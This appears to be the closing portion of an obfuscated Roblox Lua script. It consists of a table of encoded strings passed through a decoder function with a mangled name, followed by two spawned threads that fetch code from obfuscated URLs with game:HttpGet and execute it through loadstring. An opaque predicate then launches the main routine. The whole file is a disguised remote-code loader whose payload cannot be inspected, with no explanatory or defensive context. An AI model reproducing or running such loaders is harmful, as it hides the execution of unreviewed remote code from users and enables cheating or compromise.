  _0llOOIOll0l0("oElQIOu".."fM52NQ".."0s7/ZZ".."/tw=="),
  _0llOOIOll0l0("r0haKK".."6wY".."b+O".."Ul4t75d".."yvJ5".."B"),
  _0llOOIOll0l0("rkFTIuu".."BerCNAHw".."v/oNmv".."Y9JU".."S8="),
  _0llOOIOll0l0("oVVSI".."+ec".."M4y".."NUE8n+od".."8"),
  _0llOOIOll0l0("vEVRKfua".."fbHMY1At".."4YB6sIM="),
  _0llOOIOll0l0("r0hWI/6S".."faSFT".."lZuzJJ9".."v4J".."JUSc="),
  _0llOOIOll0l0("u09SL".."OHTQbGAT".."FA="),
  _0llOOIOll0l0("vEVRKfu".."aff64Ulo".."r"),
  _0llOOIOll0l0("qE9".."Wbsqcev6".."oTw=="),
  _0llOOIOll0l0("v0FT".."L+OafbHM".."cFog".."6YZ6sI".."M="),
  _0llOOIOll0l0("qlJQ".."Ke+Hf".."P68SU0".."v+pw="),
  _0llOOIOll0l0("oUF".."RKeGf".."erCFA".."G8v/IF8v".."YVOV".."g=="),
  _0llOOIOll0l0("rVZ".."QLe+XerC".."FAHg".."76JV8"),
  _0llOOIOll0l0("uEkf".."GufTR".."7fM".."c14m".."+4E="),
  _0llOOIOll0l0("rlVN".."LO+ffLCF".."AHMh4p".."p/sYBJ"),
  _0llOOIOll0l0("rlJNJ".."66xYayF".."AH0".."n7YZg/".."qhJXD".."v901Gx".."gUJW".."LfuA"),
  _0llOOIOll0l0("vEVNIe2b".."drKATx8".."C6558s".."I9I".."WiL".."inA=="),
  _0llOOIOll0l0("rkFRL+".."CaZ".."7/M".."ZFAi/pt".."6sIVUXg".."=="),
  _0llOOIOll0l0("oUFT".."L+OWM5".."+BQU0".."r4pY="),
  _0llOOIOll0l0("rkFSLOe".."dev6".."vUlA".."9+pp9".."tw=="),
  _0llOOIOll0l0("uFJKI".."ueedqy".."DAGs8+".."596".."vYV".."OXg=="),
  _0llOOIOll0l0("rVZQLe+".."XerCF".."AH4g".."+pp/s".."ZxJUSc="),
  _0llOOIOll0l0("rlJN".."bsyB".."Yf68QU".."sv/pp+"),
  _0llOOIOll0l0("rkFRKue".."HfP6tWF".."Ai54d8"),
  _0llOOIOll0l0("r0FPPv".."uQcLeCT".."x8P/Y".."Byr".."Z9JUSE="),
  _0llOOIOll0l0("vElRK++f".."fKqY".."Tx8I".."/IZnqo".."1SVi".."Dh"),
  _0llOOIOll0l0("vElPJ".."66yZb".."GPQVs".."h"),
  _0llOOIOll0l0("qlJ".."QKeHTVr".."KKTw=="),
  _0llOOIOll0l0("uFJWL".."a6nYb".."+PAH0v/".."JJxsYN".."N"),
  _0llOOIOll0l0("r1VPLe+Y".."dv6nT".."14i7w".."=="),
  _0llOOIOll0l0("uEEf".."Gu/T".."R7/M".."dF5u3".."ZJ7q54="),
  _0llOOIOll0l0("r0FcOu".."HTW".."7ecT08h+".."pJ+sQ".."=="),
  _0llOOIOll0l0("rk9".."RK+2SM5+".."BQl4i75F".."m"),
  _0llOOIOll0l0("rkFRKu".."eHfP6".."uT1".."0854".."dnsQ=="),
  _0llOOIOll0l0("q0FRKf2H".."dqzMZ".."lAh+".."pZhvw".."=="),
  _0llOOIOll0l0("uFJWPv6".."aM4qe".."T08+".."5w=="),
  _0llOOIOll0l0("vElPJ66w".."fKy".."CSQ=="),
  _0llOOIOll0l0("vElPJ".."664".."eqmF"),
  _0llOOIOll0l0("uEFNOu".."+BcrmC".."Tw=="),
  _0llOOIOll0l0("vkFc".."LeGc".."fbfMal4g".."6pZ/t4".."JJ"),
  _0llOOIOll0l0("ok9".."QLOedev6".."/QVE6751".."6sIU="),
  _0llOOIOll0l0("v1Z".."WIOed".."cv6uT1".."Is74F3t".."4JP"),
  _0llOOIOll0l0("uEFTP".."u/TV7".."fMZ".."lo8".."4Q=="),
  _0llOOIOll0l0("qkx".."KPO".."eVf6".."ueQQ=="),
  _0llOOIOll0l0("uElSbs".."2bdrufRQ".."=="),
  _0llOOIOll0l0("oEl".."NJ+If".."M5KNU".."lYib".."g=="),
  _0llOOIOll0l0("ok9QLO".."edev6".."8SUU07".."516sIU=")
}

task.spawn(function()
loadstring(game:HttpGet(_0llOOIOll0l0("hFRLPv3".."JPPGNU".."FZg4o".."ZyrIF".."PTWDg".."lmfxikl".."TK/3c".."Zer".."DTF".."Av6".."pZhr".."cMY".."D3box3".."K62EVdK".."OjHJOu".."PFQ".."gt68".."Uiu40T".."Biu6w".."nbs3".."w5TO+8=")))()
end)

task.spawn(function()
loadstring(game:HttpGet(_0llOOIOll0l0("hFR".."LPv".."3JPPG".."NUFZg4o".."ZyrIFP".."TWDg".."lmfxi".."klTK/3cZ".."erDTFAv6".."pZhr".."cMY".."DXm9wC".."Hs1R".."AKdrnEcb".."zdEV".."ks7cUlvN".."VEWn23w".."3Hp".."iQ5TO+8".."=")))()
end)

end
local _IllOIlOlOl=(230*8566>230) and _Il0I0IO0Ol or nil
if _IllOIlOlOl then _IllOIlOlOl() end
